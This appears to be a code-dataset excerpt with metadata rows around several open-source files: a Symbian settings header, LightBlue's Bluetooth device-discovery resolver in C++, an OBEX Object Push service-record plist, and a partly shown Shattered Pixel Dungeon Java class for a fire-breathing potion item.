// obtaining a copy of this software and associated documentation files
// (the "Software"), to deal in the Software without restriction,
// including without limitation the rights to use, copy, modify, merge,
// publish, distribute, sublicense, and/or sell copies of the Software,
// and to permit persons to whom the Software is furnished to do so,
// subject to the following conditions:
//
// The above copyright notice and this permission notice shall be
// included in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
// EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
// NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
// BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
// ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
// CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
// SOFTWARE.
#ifndef __SETTINGS_H__
#define __SETTINGS_H__
#ifdef __WINS__
#define ON_WINS 1
#else
#define ON_WINS 0
#endif
#define SUPPORT_PEROON 0 // ON_WINS
#define NO_SESSION_HANDLE_ACCESS SUPPORT_PEROON
/* Handle() and SubSessionHandle() always appear to return 0
with Peroon sockets. Do not know if it is safe to call
Close() on a closed Peroon socket; it is not okay with
Symbian sockets. But we shall keep track of what is open
an what is not, using these macros.
*/
#if NO_SESSION_HANDLE_ACCESS
#define IS_SESSION_OPEN(x) (x##IsOpen)
#define IS_SUBSESSION_OPEN(x) (x##IsOpen)
#define DEF_SESSION_OPEN(x) TBool x##IsOpen
#define SET_SESSION_OPEN(x) x##IsOpen = ETrue
#define SET_SESSION_CLOSED(x) x##IsOpen = EFalse
#else
#define IS_SESSION_OPEN(x) ((x).Handle() != 0)
#define IS_SUBSESSION_OPEN(x) ((x).SubSessionHandle() != 0)
#define DEF_SESSION_OPEN(x)
#define SET_SESSION_OPEN(x)
#define SET_SESSION_CLOSED(x) Mem::FillZ(&x, sizeof(x))
#endif
#define CHECK_THREAD_CORRECT 1
#if CHECK_THREAD_CORRECT
#define CTC_DEF_HANDLE(x) TThreadId x##ThreadId
#define CTC_STORE_HANDLE(x) x##ThreadId = RThread().Id()
#define CTC_IS_SAME_HANDLE(x) (x##ThreadId == RThread().Id())
#define CTC_PANIC(x) AoSocketPanic(EPanicAccessWithWrongThread)
#define CTC_CHECK(x) if (!CTC_IS_SAME_HANDLE(x)) CTC_PANIC(x)
#else
#define CTC_DEF_HANDLE(x)
#define CTC_STORE_HANDLE(x)
#define CTC_IS_SAME_HANDLE(x) ETrue
#define CTC_PANIC(x)
#define CTC_CHECK(x)
#endif
#endif // __SETTINGS_H__
| 2,816 | settings | h | en | c | code | {"qsc_code_num_words": 441, "qsc_code_num_chars": 2816.0, "qsc_code_mean_word_length": 4.66213152, "qsc_code_frac_words_unique": 0.38548753, "qsc_code_frac_chars_top_2grams": 0.04377432, "qsc_code_frac_chars_top_3grams": 0.03501946, "qsc_code_frac_chars_top_4grams": 0.01896887, "qsc_code_frac_chars_dupe_5grams": 0.20622568, "qsc_code_frac_chars_dupe_6grams": 0.11429961, "qsc_code_frac_chars_dupe_7grams": 0.03307393, "qsc_code_frac_chars_dupe_8grams": 0.03307393, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.00455487, "qsc_code_frac_chars_whitespace": 0.14240057, "qsc_code_size_file_byte": 2816.0, "qsc_code_num_lines": 83.0, "qsc_code_num_chars_line_max": 72.0, "qsc_code_num_chars_line_mean": 33.92771084, "qsc_code_frac_chars_alphabet": 0.84679089, "qsc_code_frac_chars_comments": 0.58203125, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.18918919, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codec_frac_lines_func_ratio": 0.54054054, "qsc_codec_cate_bitsstdc": 0.0, "qsc_codec_nums_lines_main": 0, "qsc_codec_frac_lines_goto": 0.0, "qsc_codec_cate_var_zero": 1.0, "qsc_codec_score_lines_no_logic": 0.54054054, "qsc_codec_frac_lines_print": 0.0, "qsc_codec_frac_lines_preprocessor_directives": null} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codec_frac_lines_func_ratio": 1, "qsc_codec_nums_lines_main": 0, "qsc_codec_score_lines_no_logic": 1, "qsc_codec_frac_lines_preprocessor_directives": 0, "qsc_codec_frac_lines_print": 0} |
0-1-0/lightblue-0.4 | src/series60/_lightblueutil/apnresolver.cpp | /*
* Copyright (c) 2009 Bea Lam. All rights reserved.
*
* This file is part of LightBlue.
*
* LightBlue is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* LightBlue is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with LightBlue. If not, see <http://www.gnu.org/licenses/>.
*/
// This is a modified version of apnresolver.cpp from the PDIS project source
// code. Original license is below.
// -*- symbian-c++ -*-
//
// apnresolver.cpp
//
// Copyright 2004 Helsinki Institute for Information Technology (HIIT)
// and the authors. All rights reserved.
//
// Authors: Tero Hasu <tero.hasu@hut.fi>
//
// Implements non-interactive Bluetooth device discovery, by
// utilizing the functionality provided by the native RHostResolver class.
//
// Permission is hereby granted, free of charge, to any person
// obtaining a copy of this software and associated documentation files
// (the "Software"), to deal in the Software without restriction,
// including without limitation the rights to use, copy, modify, merge,
// publish, distribute, sublicense, and/or sell copies of the Software,
// and to permit persons to whom the Software is furnished to do so,
// subject to the following conditions:
//
// The above copyright notice and this permission notice shall be
// included in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
// EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
// NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
// BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
// ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
// CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
// SOFTWARE.
#include <bt_sock.h>
#include <e32base.h>
#include <es_sock.h>
#include "localepocpyutils.h"
#include "panic.h"
#include "settings.h"
// --------------------------------------------------------------------
// CAoResolver...
class CAoResolver : public CActive
{
public:
static CAoResolver* NewL();
~CAoResolver();
//void Discover(PyObject* aCallback, PyObject* aParam);
void Discover(PyObject* aCallback, PyObject* aParam, bool getNames);
void Next();
private:
CAoResolver();
void ConstructL();
private: // CActive
void RunL();
void DoCancel();
private:
RSocketServ iSocketServ;
RHostResolver iHostResolver;
TInquirySockAddr iInquirySockAddr;
TNameEntry iNameEntry;
void Free();
PyObject* iCallback;
PyObject* iParam;
bool iLookupNames;
PyThreadState* iThreadState;
CTC_DEF_HANDLE(ctc);
};
void CAoResolver::Free()
{
if (iCallback)
{
Py_DECREF(iCallback);
iCallback = NULL;
}
if (iParam)
{
Py_DECREF(iParam);
iParam = NULL;
}
}
CAoResolver* CAoResolver::NewL()
{
CAoResolver* obj = new (ELeave) CAoResolver;
CleanupStack::PushL(obj);
obj->ConstructL();
CleanupStack::Pop();
return obj;
}
CAoResolver::CAoResolver() : CActive(EPriorityStandard)
{
CActiveScheduler::Add(this);
CTC_STORE_HANDLE(ctc);
}
void CAoResolver::ConstructL()
{
User::LeaveIfError(iSocketServ.Connect());
TProtocolName protocolName;
_LIT(KBtLinkManager, "BTLinkManager");
protocolName.Copy(KBtLinkManager);
TProtocolDesc protocolDesc;
User::LeaveIfError(iSocketServ.FindProtocol(protocolName, protocolDesc));
User::LeaveIfError(iHostResolver.Open(iSocketServ,
protocolDesc.iAddrFamily,
protocolDesc.iProtocol));
}
CAoResolver::~CAoResolver()
{
CTC_CHECK(ctc);
Cancel();
Free();
if (iHostResolver.SubSessionHandle() != 0)
{
iHostResolver.Close();
}
if (iSocketServ.Handle() != 0)
{
iSocketServ.Close();
}
}
//void CAoResolver::Discover(PyObject* aCallback, PyObject* aParam)
void CAoResolver::Discover(PyObject* aCallback, PyObject* aParam, bool lookupNames)
{
if (IsActive())
{
AoSocketPanic(EPanicRequestAlreadyPending);
}
Free();
AssertNonNull(aCallback);
AssertNonNull(aParam);
iCallback = aCallback;
Py_INCREF(aCallback);
iParam = aParam;
Py_INCREF(aParam);
iThreadState = PyThreadState_Get();
iInquirySockAddr.SetIAC(KGIAC);
//iInquirySockAddr.SetAction(KHostResInquiry|KHostResName);
// MODIFIED: use lookupNames parameter
iLookupNames = lookupNames;
if (iLookupNames)
iInquirySockAddr.SetAction(KHostResInquiry|KHostResName|KHostResIgnoreCache);
else
iInquirySockAddr.SetAction(KHostResInquiry|KHostResIgnoreCache);
iHostResolver.GetByAddress(iInquirySockAddr, iNameEntry, iStatus);
SetActive();
}
void CAoResolver::Next()
{
if (IsActive())
{
AoSocketPanic(EPanicRequestAlreadyPending);
}
if (!iCallback)
{
AoSocketPanic(EPanicNextBeforeFirst);
}
iHostResolver.Next(iNameEntry, iStatus);
SetActive();
}
void CAoResolver::RunL()
{
TInt error = iStatus.Int();
AssertNonNull(iCallback);
AssertNonNull(iParam);
PyEval_RestoreThread(iThreadState);
PyObject* arg;
if (error == KErrNone)
{
TSockAddr& sockAddr = iNameEntry().iAddr;
TBTDevAddr btDevAddr = static_cast<TBTSockAddr>(sockAddr).BTAddr();
TBuf<32> addrBuf;
btDevAddr.GetReadable(addrBuf);
THostName& hostName = iNameEntry().iName;
//arg = Py_BuildValue("(iu#u#O)", error,
// addrBuf.Ptr(),
// addrBuf.Length(),
// hostName.Ptr(),
// hostName.Length(),
// iParam);
// MODIFIED - add a 3-item tuple containing device class info into 'arg'
TInquirySockAddr &isa = TInquirySockAddr::Cast(iNameEntry().iAddr);
TInt16 serviceClass = (TInt16)isa.MajorServiceClass();
TInt8 majorClass = (TInt8)isa.MajorClassOfDevice();
TInt8 minorClass = (TInt8)isa.MinorClassOfDevice();
if (iLookupNames)
{
arg = Py_BuildValue("(iu#u#(iii)O)", error,
addrBuf.Ptr(),
addrBuf.Length(),
hostName.Ptr(),
hostName.Length(),
serviceClass,
majorClass,
minorClass,
iParam);
}
else
{
// pass None instead of the hostName
arg = Py_BuildValue("(iu#O(iii)O)", error,
addrBuf.Ptr(),
addrBuf.Length(),
Py_None,
serviceClass,
majorClass,
minorClass,
iParam);
}
}
else
{
//arg = Py_BuildValue("(iOOO)", error, Py_None, Py_None, iParam);
// MODIFIED - pass an extra Py_None, since there's now the extra
// tuple containing device class info
arg = Py_BuildValue("(iOOOO)", error, Py_None, Py_None, Py_None, iParam);
}
if (arg)
{
PyObject* result = PyObject_CallObject(iCallback, arg);
Py_DECREF(arg);
Py_XDECREF(result);
if (!result)
{
// Callbacks are not supposed to throw exceptions.
// Make sure that the error gets noticed.
PyErr_Clear();
AoSocketPanic(EPanicExceptionInCallback);
}
}
else
{
// It is misleading for an exception stack trace
// to pop up later in some other context.
// Perhaps we shall simply accept that an out
// of memory condition will cause all sorts of
// weird problems that we cannot properly act on.
// We will just put a stop to things right here.
PyErr_Clear();
AoSocketPanic(EPanicOutOfMemory);
}
PyEval_SaveThread();
// the callback may have done anything, including
// deleting the object whose method we are in,
// so do not attempt to access any property anymore
}
void CAoResolver::DoCancel()
{
// iHostResolver will have been initialized if we get this
// far, so calling Cancel() on it is fine
iHostResolver.Cancel();
}
// --------------------------------------------------------------------
// object structure...
// we store the state we require in a Python object
typedef struct
{
PyObject_VAR_HEAD;
CAoResolver* iResolver;
} apn_resolver_object;
// --------------------------------------------------------------------
// instance methods...
static PyObject* apn_resolver_discover(apn_resolver_object* self,
PyObject* args)
{
PyObject* cb;
PyObject* param;
char getNames;
//if (!PyArg_ParseTuple(args, "OO", &cb, ¶m))
// MODIFIED: add a boolean argument
if (!PyArg_ParseTuple(args, "OOb", &cb, ¶m, &getNames))
{
return NULL;
}
if (!PyCallable_Check(cb))
{
PyErr_SetString(PyExc_TypeError, "parameter must be callable");
return NULL;
}
if (!self->iResolver)
{
AoSocketPanic(EPanicUseBeforeInit);
}
//self->iResolver->Discover(cb, param);
self->iResolver->Discover(cb, param, getNames);
RETURN_NO_VALUE;
}
static PyObject* apn_resolver_next(apn_resolver_object* self,
PyObject* /*args*/)
{
if (!self->iResolver)
{
AoSocketPanic(EPanicUseBeforeInit);
}
self->iResolver->Next();
RETURN_NO_VALUE;
}
static PyObject* apn_resolver_cancel(apn_resolver_object* self,
PyObject* /*args*/)
{
if (self->iResolver)
{
self->iResolver->Cancel();
}
RETURN_NO_VALUE;
}
/** Creates the Symbian object (the Python object has already
been created). This must be done in the thread that will
be using the object, as we want to register with the active
scheduler of that thread.
*/
static PyObject* apn_resolver_open(apn_resolver_object* self,
PyObject* /*args*/)
{
AssertNull(self->iResolver);
TRAPD(error, self->iResolver = CAoResolver::NewL());
if (error)
{
return SPyErr_SetFromSymbianOSErr(error);
}
RETURN_NO_VALUE;
}
/** Destroys the Symbian object, but not the Python object.
This must be done in the thread that used the object,
as we must deregister with the correct active scheduler.
*/
static PyObject* apn_resolver_close(apn_resolver_object* self,
PyObject* /*args*/)
{
delete self->iResolver;
self->iResolver = NULL;
RETURN_NO_VALUE;
}
const static PyMethodDef apn_resolver_methods[] =
{
{"open", (PyCFunction)apn_resolver_open, METH_NOARGS},
{"discover", (PyCFunction)apn_resolver_discover, METH_VARARGS},
{"next", (PyCFunction)apn_resolver_next, METH_NOARGS},
{"cancel", (PyCFunction)apn_resolver_cancel, METH_NOARGS},
{"close", (PyCFunction)apn_resolver_close, METH_NOARGS},
{NULL, NULL} // sentinel
};
static void apn_dealloc_resolver(apn_resolver_object *self)
{
delete self->iResolver;
self->iResolver = NULL;
PyObject_Del(self);
}
static PyObject *apn_resolver_getattr(apn_resolver_object *self,
char *name)
{
return Py_FindMethod((PyMethodDef*)apn_resolver_methods,
(PyObject*)self, name);
}
// --------------------------------------------------------------------
// type...
const PyTypeObject apn_resolver_typetmpl =
{
PyObject_HEAD_INIT(NULL)
0, /*ob_size*/
"aosocketnativenew.AoResolver", /*tp_name*/
sizeof(apn_resolver_object), /*tp_basicsize*/
0, /*tp_itemsize*/
/* methods */
(destructor)apn_dealloc_resolver, /*tp_dealloc*/
0, /*tp_print*/
(getattrfunc)apn_resolver_getattr, /*tp_getattr*/
0, /*tp_setattr*/
0, /*tp_compare*/
0, /*tp_repr*/
0, /*tp_as_number*/
0, /*tp_as_sequence*/
0, /*tp_as_mapping*/
0 /*tp_hash*/
};
TInt apn_resolver_ConstructType()
{
return ConstructType(&apn_resolver_typetmpl, "AoResolver");
}
// --------------------------------------------------------------------
// module methods...
#define AoResolverType ((PyTypeObject*)SPyGetGlobalString("AoResolver"))
// Returns NULL if cannot allocate.
// The reference count of any returned object will be 1.
// The created socket object will be initialized,
// but the socket will not be open.
static apn_resolver_object* NewResolverObject()
{
apn_resolver_object* newResolver =
// sets refcount to 1 if successful,
// so decrefing should delete
PyObject_New(apn_resolver_object, AoResolverType);
if (newResolver == NULL)
{
// raise an exception with the reason set by PyObject_New
return NULL;
}
newResolver->iResolver = NULL;
return newResolver;
}
// allocates a new AoResolver object, or raises and exception
PyObject* apn_resolver_new(PyObject* /*self*/, PyObject* /*args*/)
{
return reinterpret_cast<PyObject*>(NewResolverObject());
}
| 12,684 | apnresolver | cpp | en | cpp | code | {"qsc_code_num_words": 1424, "qsc_code_num_chars": 12684.0, "qsc_code_mean_word_length": 5.91502809, "qsc_code_frac_words_unique": 0.33918539, "qsc_code_frac_chars_top_2grams": 0.03917844, "qsc_code_frac_chars_top_3grams": 0.0242194, "qsc_code_frac_chars_top_4grams": 0.01745221, "qsc_code_frac_chars_dupe_5grams": 0.15980055, "qsc_code_frac_chars_dupe_6grams": 0.10768135, "qsc_code_frac_chars_dupe_7grams": 0.06957141, "qsc_code_frac_chars_dupe_8grams": 0.03110531, "qsc_code_frac_chars_dupe_9grams": 0.0242194, "qsc_code_frac_chars_dupe_10grams": 0.01282203, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.00349548, "qsc_code_frac_chars_whitespace": 0.18803217, "qsc_code_size_file_byte": 12684.0, "qsc_code_num_lines": 495.0, "qsc_code_num_chars_line_max": 84.0, "qsc_code_num_chars_line_mean": 25.62424242, "qsc_code_frac_chars_alphabet": 0.81435091, "qsc_code_frac_chars_comments": 0.41138442, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.19805195, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.02464506, "qsc_code_frac_chars_long_word_length": 0.00375033, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.01623377, "qsc_codecpp_frac_lines_preprocessor_directives": 0.04545455, "qsc_codecpp_frac_lines_func_ratio": 0.06493506, "qsc_codecpp_cate_bitsstdc": 0.0, "qsc_codecpp_nums_lines_main": 0.0, "qsc_codecpp_frac_lines_goto": 0.0, "qsc_codecpp_cate_var_zero": 0.0, "qsc_codecpp_score_lines_no_logic": 0.11038961, "qsc_codecpp_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codecpp_frac_lines_func_ratio": 0, "qsc_codecpp_nums_lines_main": 0, "qsc_codecpp_score_lines_no_logic": 0, "qsc_codecpp_frac_lines_preprocessor_directives": 0, "qsc_codecpp_frac_lines_print": 0} |
0-1-0/lightblue-0.4 | src/mac/LightAquaBlue/OBEXObjectPushDictionary.plist | <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>0001 - ServiceClassIDList</key>
<array>
<data>
EQU=
</data>
</array>
<key>0004 - ProtocolDescriptorList</key>
<array>
<array>
<data>
AQA=
</data>
</array>
<array>
<data>
AAM=
</data>
<dict>
<key>DataElementSize</key>
<integer>1</integer>
<key>DataElementType</key>
<integer>1</integer>
<key>DataElementValue</key>
<integer>3</integer>
</dict>
</array>
<array>
<data>
AAg=
</data>
</array>
</array>
<key>0005 - BrowseGroupList*</key>
<array>
<data>
EAI=
</data>
</array>
<key>0006 - LanguageBaseAttributeIDList*</key>
<array>
<dict>
<key>DataElementSize</key>
<integer>2</integer>
<key>DataElementType</key>
<integer>1</integer>
<key>DataElementValue</key>
<integer>25966</integer>
</dict>
<dict>
<key>DataElementSize</key>
<integer>2</integer>
<key>DataElementType</key>
<integer>1</integer>
<key>DataElementValue</key>
<integer>106</integer>
</dict>
<dict>
<key>DataElementSize</key>
<integer>2</integer>
<key>DataElementType</key>
<integer>1</integer>
<key>DataElementValue</key>
<integer>256</integer>
</dict>
</array>
<key>0009 - BluetoothProfileDescriptorList</key>
<array>
<array>
<data>
EQU=
</data>
<dict>
<key>DataElementSize</key>
<integer>2</integer>
<key>DataElementType</key>
<integer>1</integer>
<key>DataElementValue</key>
<integer>256</integer>
</dict>
</array>
</array>
<key>0303 - Supported Formats List</key>
<array>
<dict>
<key>DataElementType</key>
<integer>1</integer>
<key>DataElementValue</key>
<data>
/w==
</data>
</dict>
</array>
</dict>
</plist>
| 1,888 | OBEXObjectPushDictionary | plist | en | openstep property list | data | {"qsc_code_num_words": 211, "qsc_code_num_chars": 1888.0, "qsc_code_mean_word_length": 5.48815166, "qsc_code_frac_words_unique": 0.2464455, "qsc_code_frac_chars_top_2grams": 0.13816926, "qsc_code_frac_chars_top_3grams": 0.06649396, "qsc_code_frac_chars_top_4grams": 0.10880829, "qsc_code_frac_chars_dupe_5grams": 0.56217617, "qsc_code_frac_chars_dupe_6grams": 0.56131261, "qsc_code_frac_chars_dupe_7grams": 0.52677029, "qsc_code_frac_chars_dupe_8grams": 0.52677029, "qsc_code_frac_chars_dupe_9grams": 0.52677029, "qsc_code_frac_chars_dupe_10grams": 0.47668394, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.03841146, "qsc_code_frac_chars_whitespace": 0.18644068, "qsc_code_size_file_byte": 1888.0, "qsc_code_num_lines": 98.0, "qsc_code_num_chars_line_max": 112.0, "qsc_code_num_chars_line_mean": 19.26530612, "qsc_code_frac_chars_alphabet": 0.71549479, "qsc_code_frac_chars_comments": 0.0, "qsc_code_cate_xml_start": 1.0, "qsc_code_frac_lines_dupe_lines": 0.81632653, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.04925847, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_words_unique": 1, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 1, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 1, "qsc_code_cate_autogen": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/potions/exotic/PotionOfDragonsBreath.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.potions.exotic;
import com.shatteredpixel.shatteredpixeldungeon.Assets;
import com.shatteredpixel.shatteredpixeldungeon.Dungeon;
import com.shatteredpixel.shatteredpixeldungeon.actors.Actor;
import com.shatteredpixel.shatteredpixeldungeon.actors.Char;
import com.shatteredpixel.shatteredpixeldungeon.actors.blobs.Blob;
import com.shatteredpixel.shatteredpixeldungeon.actors.blobs.Fire;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Buff;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Burning;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Cripple;
import com.shatteredpixel.shatteredpixeldungeon.actors.hero.Hero;
import com.shatteredpixel.shatteredpixeldungeon.effects.MagicMissile;
import com.shatteredpixel.shatteredpixeldungeon.mechanics.Ballistica;
import com.shatteredpixel.shatteredpixeldungeon.messages.Messages;
import com.shatteredpixel.shatteredpixeldungeon.scenes.CellSelector;
import com.shatteredpixel.shatteredpixeldungeon.scenes.GameScene;
import com.watabou.noosa.audio.Sample;
import com.watabou.utils.Callback;
import com.watabou.utils.PathFinder;
import java.util.HashSet;
public class PotionOfDragonsBreath extends ExoticPotion {
{
initials = 6;
}
//a lot of this is copy-paste from wand of fireblast
//the actual affected cells
private HashSet<Integer> affectedCells;
//the cells to trace fire shots to, for visual effects.
private HashSet<Integer> visualCells;
private int direction = 0;
@Override
//need to override drink so that time isn't spent right away
protected void drink(final Hero hero) {
curItem = detach( hero.belongings.backpack );
setKnown();
GameScene.selectCell(targeter);
}
private CellSelector.Listener targeter = new CellSelector.Listener() {
@Override
public void onSelect(final Integer cell) {
if (cell == null){
//TODO if this can ever be found un-IDed, need logic for that
curItem.collect();
} else {
Sample.INSTANCE.play( Assets.SND_DRINK );
curUser.sprite.operate(curUser.pos, new Callback() {
@Override
public void call() {
curUser.spend(1f);
curUser.sprite.idle();
curUser.sprite.zap(cell);
final Ballistica bolt
= new Ballistica(curUser.pos, cell, Ballistica.MAGIC_BOLT);
affectedCells = new HashSet<>();
visualCells = new HashSet<>();
int maxDist = 6;
int dist = Math.min(bolt.dist, maxDist);
for (int i = 0; i < PathFinder.CIRCLE8.length; i++) {
if (bolt.sourcePos + PathFinder.CIRCLE8[i] == bolt.path.get(1)) {
direction = i;
break;
}
}
float strength = maxDist;
for (int c : bolt.subPath(1, dist)) {
strength--; //as we start at dist 1, not 0.
affectedCells.add(c);
if (strength > 1) {
spreadFlames(c + PathFinder.CIRCLE8[left(direction)], strength - 1);
spreadFlames(c + PathFinder.CIRCLE8[direction], strength - 1);
spreadFlames(c + PathFinder.CIRCLE8[right(direction)], strength - 1);
} else {
visualCells.add(c);
}
}
//going to call this one manually
visualCells.remove(bolt.path.get(dist));
for (int c : visualCells) {
//this way we only get the cells at the tip, much better performance.
((MagicMissile) curUser.sprite.parent.recycle(MagicMissile.class)).reset(
MagicMissile.FIRE_CONE,
curUser.sprite,
c,
null
);
}
MagicMissile.boltFromChar(curUser.sprite.parent,
MagicMissile.FIRE_CONE,
curUser.sprite,
bolt.path.get(dist / 2),
new Callback() {
@Override
public void call() {
for (int cell : affectedCells){
//ignore caster cell
if (cell == bolt.sourcePos){
continue;
}
GameScene.add( Blob.seed( cell, 5, Fire.class ) );
Char ch = Actor.findChar( cell );
if (ch != null) {
Buff.affect( ch, Burning.class ).reignite( ch );
Buff.affect(ch, Cripple.class, 5f); break;
}
}
}
});
}
});
}
}
@Override
public String prompt() {
return Messages.get(PotionOfDragonsBreath.class, "prompt");
}
};
//burn... BURNNNNN!.....
